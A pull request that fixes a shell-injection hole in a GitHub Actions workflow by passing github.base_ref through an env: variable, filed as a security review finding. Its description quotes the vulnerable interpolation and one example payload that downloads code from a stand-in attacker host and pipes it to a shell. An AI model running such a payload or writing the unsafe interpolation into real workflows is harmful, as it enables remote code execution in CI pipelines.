### PR TITLE
fix(infra-marketplace): pass base_ref through env: to block shell injection

### DIFF
--- a/examples/marketplace-governance/.github/workflows/plugin-governance.yml
+++ b/examples/marketplace-governance/.github/workflows/plugin-governance.yml
@@ -34,8 +34,10 @@ jobs:
 
       - name: Detect changed plugins
         id: changes
+        env:
+          BASE_REF: ${{ github.base_ref }}
         run: |
-          PLUGINS=$(git diff --name-only origin/${{ github.base_ref }}...HEAD \
+          PLUGINS=$(git diff --name-only "origin/${BASE_REF}...HEAD" \
             | grep '^plugins/' \
             | cut -d'/' -f1-2 \
             | sort -u)


### PR DESCRIPTION
## Summary

`examples/marketplace-governance/.github/workflows/plugin-governance.yml:38` interpolates `github.base_ref` directly into a bash script:

```yaml
- name: Detect changed plugins
  run: |
    PLUGINS=\$(git diff --name-only origin/\${{ github.base_ref }}...HEAD \
      | grep '^plugins/' \
      | cut -d'/' -f1-2 \
      | sort -u)
```

GitHub's expression engine substitutes `\${{ github.base_ref }}` into the script text **before** the shell sees it. A `base_ref` containing shell metacharacters (e.g. `\$(curl evil.com/x | sh)`) gets evaluated by bash. This is the textbook GitHub Actions shell-injection class.

`base_ref` is harder to attacker-control than user-content fields (it has to be a real branch name in the upstream repo at PR time), but the pattern is wrong regardless — examples teach consumers what to do.

## Change

Move the value into the step's `env:` block and reference it as a shell variable in quotes:

```yaml
- name: Detect changed plugins
  id: changes
  env:
    BASE_REF: \${{ github.base_ref }}
  run: |
    PLUGINS=\$(git diff --name-only \"origin/\${BASE_REF}...HEAD\" \
      | ...
```

GitHub writes the value to the env at step start, the shell receives it as a normal environment variable, and any metacharacters in `BASE_REF` are preserved as literals.

[GitHub Actions hardening guide](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#using-an-intermediate-environment-variable) documents this exact pattern.

## Test plan

- [ ] CI passes
- [ ] Existing PRs against `main` continue to compute the changed-plugin list correctly

---

Surfaced as part of the AEGIS Initiative review of the agent-governance-toolkit (HIGH severity, Infrastructure / CI section). Filed by Ken Tannenbaum (AEGIS Initiative).